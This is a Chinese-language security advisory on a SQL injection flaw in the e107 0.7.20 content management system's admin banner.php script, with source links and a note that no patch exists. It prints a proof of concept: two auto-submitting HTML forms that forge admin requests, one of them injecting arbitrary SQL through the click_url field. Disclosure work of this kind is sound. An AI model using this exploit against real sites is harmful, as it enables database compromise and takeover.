e107 e107_admin/banner.php页面SQL注入漏洞
发布日期:2010-04-21
更新日期:2010-04-22
受影响系统:e107.org e107 0.7.20
描述:
BUGTRAQ ID:
39609
e107是用php编写的内容管理系统。
e107的/e107_admin/banner.php脚本没有正确地验证HTTP请求的来源,没有正确地过滤用户所提交的$click_url变量参数,远程攻击者可以通过向服务器提交恶意请求执行SQL注入攻击,导致完全入侵数据库系统。
<*来源:High-Tech Bridge SA (
http://www.htbridge.ch/)
链接:
http://secunia.com/advisories/39498/
http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<form action=
http://host/e107_admin/banner.php method=POST name=f>
<input type=hidden name=banner_campaign_sel value="campaign_one" >
<input type=hidden name=banner_campaign value="" >
<input type=hidden name=banner_client_sel value="e107" >
<input type=hidden name=client_name value="" >
<input type=hidden name=client_login value="e107login" >
<input type=hidden name=client_password value="e107password" >
<input type=hidden name=click_url value="http%3A%2F%2Fgoogle.com%2F" >
<input type=hidden name=impressions_purchased value="0" >
<input type=hidden name=banner_class value="0" >
<input type=hidden name=createbanner value="Create+New+Banner" >
</form>
<script>
document.f.submit();
</script>
<form action=
http://host/e107_admin/banner.php method=POST name=f>
<input type=hidden name=createbanner value="Create+New+Banner" >
<input type=hidden name=click_url value="' ANY_SQL_HERE " >
</form>
<script>
document.f.submit();
</script>
建议:
厂商补丁:
e107.org
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://e107.org/浏览次数:3588
严重程度:0(网友投票)
